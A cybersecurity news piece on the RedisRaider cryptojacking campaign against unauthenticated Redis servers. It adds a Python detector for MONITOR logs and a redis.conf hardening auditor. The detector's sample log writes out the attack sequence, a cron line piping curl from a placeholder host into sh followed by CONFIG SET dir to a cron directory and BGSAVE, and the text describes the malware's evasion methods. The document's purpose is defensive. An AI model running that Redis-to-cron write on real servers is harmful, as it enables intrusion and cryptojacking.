CyberSecurity news
Aminu Abdullahi@eSecurity Planet
Cybersecurity researchers are raising alarms about a new cryptojacking campaign, RedisRaider, that targets publicly accessible Redis servers running on Linux. Discovered by Datadog Security Labs, RedisRaider uses an aggressive and technically involved attack chain to deploy Monero miners on compromised hosts. The malware carries its own scanner to find Redis instances exposed to the internet, then abuses weak configuration (instances that accept commands without authentication) to plant a malicious cron job that downloads and runs the primary payload.
The attackers behind RedisRaider go to some lengths to evade detection and analysis. The malware is written in Go and obfuscated with Garble, which renames identifiers and strips build metadata so that key functions are hard to pick out. It also takes anti-forensic measures: it sets short time-to-live (TTL) values on the keys it writes so they expire on their own, writes its files into cron directories where they blend in with legitimate scheduled jobs, and deletes keys and logs after execution to cover its tracks. Together these make the activity harder to spot and harder to reconstruct after the fact.
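The two paragraphs above describe the attack chain at a high level: a key containing a cron line is written with a short TTL, the Redis working directory is pointed at a cron directory, the database is dumped there, and the key is deleted. The following detector, an added example that is not code from the page, from Datadog or from the malware, walks `redis-cli MONITOR` output and flags that sequence per client. The sample MONITOR lines are constructed for the example; the IP addresses, key names and script URL in them are placeholders, not campaign indicators.

```python
import re
from dataclasses import dataclass, field
from typing import Optional

# Constructed sample of `redis-cli MONITOR` output (not a real capture).
# MONITOR prints one line per command: <unix_ts> [<db> <client_ip:port>] "CMD" "arg" ...
# The first client performs the Redis-to-cron write; the second is ordinary
# application traffic that must not be flagged.
SAMPLE_MONITOR = r'''
1715000000.100001 [0 203.0.113.7:51222] "INFO" "server"
1715000000.200002 [0 203.0.113.7:51222] "SET" "backup1" "\n\n*/2 * * * * root curl -fsSL http://198.51.100.9/x.sh | sh\n\n" "EX" "30"
1715000000.300003 [0 203.0.113.7:51222] "CONFIG" "SET" "dir" "/etc/cron.d"
1715000000.400004 [0 203.0.113.7:51222] "CONFIG" "SET" "dbfilename" "apache"
1715000000.500005 [0 203.0.113.7:51222] "BGSAVE"
1715000000.600006 [0 203.0.113.7:51222] "DEL" "backup1"
1715000001.000007 [0 10.0.0.15:40110] "GET" "session:abc"
1715000001.100008 [0 10.0.0.15:40110] "SET" "session:abc" "{\"uid\":42}" "EX" "3600"
'''

LINE_RE = re.compile(r'^(?P<ts>\d+\.\d+) \[(?P<db>\d+) (?P<client>[^\]]+)\] (?P<rest>.*)$')
ARG_RE = re.compile(r'"((?:[^"\\]|\\.)*)"')          # MONITOR quotes every argument
CRON_LINE_RE = re.compile(r'(?:[\d*/,-]+\s+){5}\S|@reboot\s')  # five schedule fields + command
CRON_DIRS = ("/etc/cron.d", "/var/spool/cron", "/etc/cron.hourly",
             "/etc/cron.daily", "/etc/cron.weekly", "/etc/cron.monthly")
SHORT_TTL_SECONDS = 300  # threshold (assumption): keys meant to vanish before anyone looks


@dataclass
class ClientState:
    cron_dir: Optional[str] = None
    dbfilename: Optional[str] = None
    staged_keys: set = field(default_factory=set)


def parse_monitor_line(line):
    """Split a MONITOR line into (timestamp, client, COMMAND, [args]) or None."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    args = ARG_RE.findall(m.group("rest"))
    if not args:
        return None
    return m.group("ts"), m.group("client"), args[0].upper(), args[1:]


def set_ttl_seconds(options):
    """TTL requested by SET's EX/PX options, in seconds, or None if the key is persistent."""
    for i, opt in enumerate(options):
        if opt.upper() == "EX" and i + 1 < len(options):
            return float(options[i + 1])
        if opt.upper() == "PX" and i + 1 < len(options):
            return float(options[i + 1]) / 1000
    return None


def detect_cron_write(monitor_text):
    """Return (ts, client, stage, detail) findings in MONITOR order, tracking state per client."""
    state, findings = {}, []
    for line in monitor_text.splitlines():
        parsed = parse_monitor_line(line)
        if parsed is None:
            continue
        ts, client, cmd, args = parsed
        st = state.setdefault(client, ClientState())
        if cmd == "SET" and len(args) >= 2:
            key, value = args[0], args[1]
            if CRON_LINE_RE.search(value):            # a crontab line stored as a Redis value
                st.staged_keys.add(key)
                ttl = set_ttl_seconds(args[2:])
                note = f", TTL {ttl:g}s" if ttl is not None and ttl <= SHORT_TTL_SECONDS else ""
                findings.append((ts, client, "stage_payload", f"cron line stored in key {key!r}{note}"))
        elif cmd == "CONFIG" and len(args) >= 3 and args[0].upper() == "SET":
            param, value = args[1].lower(), args[2]
            if param == "dir" and value.startswith(CRON_DIRS):
                st.cron_dir = value
                findings.append((ts, client, "redirect_dir", f"dump directory moved to {value}"))
            elif param == "dbfilename":
                st.dbfilename = value
        elif cmd in ("SAVE", "BGSAVE") and st.cron_dir:
            target = f"{st.cron_dir}/{st.dbfilename or 'dump.rdb'}"
            findings.append((ts, client, "dump_to_cron",
                             f"{cmd} writes {target} containing keys {sorted(st.staged_keys)}"))
        elif cmd == "DEL" and st.staged_keys.intersection(args):
            gone = sorted(st.staged_keys.intersection(args))
            findings.append((ts, client, "cleanup", f"staged key(s) deleted: {gone}"))
    return findings


if __name__ == "__main__":
    for ts, client, stage, detail in detect_cron_write(SAMPLE_MONITOR):
        print(f"{ts} {client:<20} {stage:<14} {detail}")
```

The `dump_to_cron` stage is the high-confidence signal: cron ignores the binary RDB framing around the line but executes the embedded crontab entry, which is why the `dir` change alone is worth an alert even if the `SAVE` never arrives. MONITOR is expensive on a busy instance; the same logic applies to a command log collected by a proxy or an eBPF tracer.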
Datadog's investigation found that the infrastructure used for the server-side attacks also hosted a web-based Monero miner, so the operators earn from two sources: hijacked Linux servers and the browsers of unsuspecting website visitors. The defensive advice is the usual one for Redis: an instance that is reachable from the internet and accepts commands without authentication will be found and used. Require authentication (requirepass or ACLs), bind only to trusted interfaces, leave protected mode on, and disable or restrict administrative commands such as CONFIG, so that RedisRaider and similar cryptojacking campaigns cannot turn the server's CPU into someone else's income.
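To make the hardening advice concrete, here is an added example (not code from the page or from Datadog) that audits a `redis.conf` for the settings RedisRaider relies on. The two configuration fragments are constructed for the example: the weak one is an internet-exposed, passwordless instance; the hardened one shows the corrected directives. The password value is a placeholder.

```python
import shlex

# Constructed redis.conf fragments (not from any real deployment).
WEAK_CONF = """
bind 0.0.0.0
port 6379
protected-mode no
# requirepass is not set: anyone who can reach the port has full access
"""

HARDENED_CONF = """
bind 127.0.0.1 -::1
port 6379
protected-mode yes
requirepass "replace-with-a-long-random-secret-from-a-vault"
rename-command CONFIG ""
rename-command DEBUG ""
dir /var/lib/redis
"""

ALL_INTERFACES = {"0.0.0.0", "::", "*"}


def parse_redis_conf(text):
    """Map each directive (lower-cased) to the list of argument lists it was given with."""
    directives = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        parts = shlex.split(line)           # handles requirepass "quoted" and rename-command X ""
        directives.setdefault(parts[0].lower(), []).append(parts[1:])
    return directives


def audit_redis_conf(text):
    """Return a list of findings; an empty list means the checked directives are hardened."""
    d = parse_redis_conf(text)
    findings = []

    # Exposure: Redis 6+ allows a leading '-' on bind addresses (optional address), strip it.
    binds = [a.lstrip("-") for args in d.get("bind", []) for a in args]
    if not binds:
        findings.append("bind: absent, Redis listens on every interface unless protected-mode blocks it")
    elif any(b in ALL_INTERFACES for b in binds):
        findings.append(f"bind: listens on all interfaces ({' '.join(binds)})")

    # Protected mode only helps when no bind/password is set, but disabling it is never right.
    pm = d.get("protected-mode", [["yes"]])[-1]
    if pm and pm[0].lower() == "no":
        findings.append("protected-mode: disabled; unauthenticated remote clients are accepted")

    # Authentication: legacy requirepass, an ACL file, or inline ACL users with a password.
    has_pass = any(args and args[0] for args in d.get("requirepass", []))
    has_acl = "aclfile" in d or any(
        any(tok.startswith((">", "#")) for tok in args) for args in d.get("user", []))
    if not has_pass and not has_acl:
        findings.append("requirepass: not set and no ACL users/aclfile; every client is an administrator")

    # CONFIG SET dir + dbfilename + SAVE is the file-write primitive behind the cron drop.
    disabled = {args[0].upper() for args in d.get("rename-command", [])
                if len(args) >= 2 and args[1] == ""}
    if "CONFIG" not in disabled:
        findings.append("CONFIG: reachable; CONFIG SET dir/dbfilename + SAVE lets a client write "
                        "files anywhere the redis user can (disable it or deny it via ACL)")
    return findings


if __name__ == "__main__":
    for name, conf in (("weak", WEAK_CONF), ("hardened", HARDENED_CONF)):
        print(f"[{name}]")
        for finding in audit_redis_conf(conf) or ["no findings"]:
            print("  -", finding)
```

`rename-command` is the long-standing way to remove CONFIG; on Redis 6 and later the same effect is better achieved with ACLs (for example a `-@dangerous` or `-config` rule on the application user), which the auditor would also have to read. Run the audit in CI against the rendered config, and run it again on the live instance with `CONFIG GET` where CONFIG is still available, since the file on disk and the running state can drift.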
References:
- cyberpress.org: A newly discovered cryptojacking campaign, dubbed RedisRaider, is targeting publicly accessible Redis servers on Linux systems with an aggressive and technically complex attack chain.
- thehackernews.com: Cybersecurity researchers are calling attention to a new Linux cryptojacking campaign that's targeting publicly accessible Redis servers.
- eSecurity Planet: New Go-Based Malware ‘RedisRaider’ Exploits Redis Servers to Mine Cryptocurrency
- Cyber Security News: New RedisRaider Campaign Attacking Linux Servers by Abusing Redis Configuration
- gbhackers.com: Datadog Security Research has uncovered a formidable new cryptojacking campaign dubbed “RedisRaider,” specifically targeting Linux servers with publicly accessible Redis instances.
Classification:
- HashTags: #Malware #Cryptojacking #RedisRaider
- Company: Redis
- Target: Linux Servers
- Attacker: Unknown (not attributed; Datadog Security Labs is the researcher that reported the campaign)
- Product: Redis
- Feature: Misconfiguration Exploitation
- Malware: RedisRaider
- Type: Malware
- Severity: Medium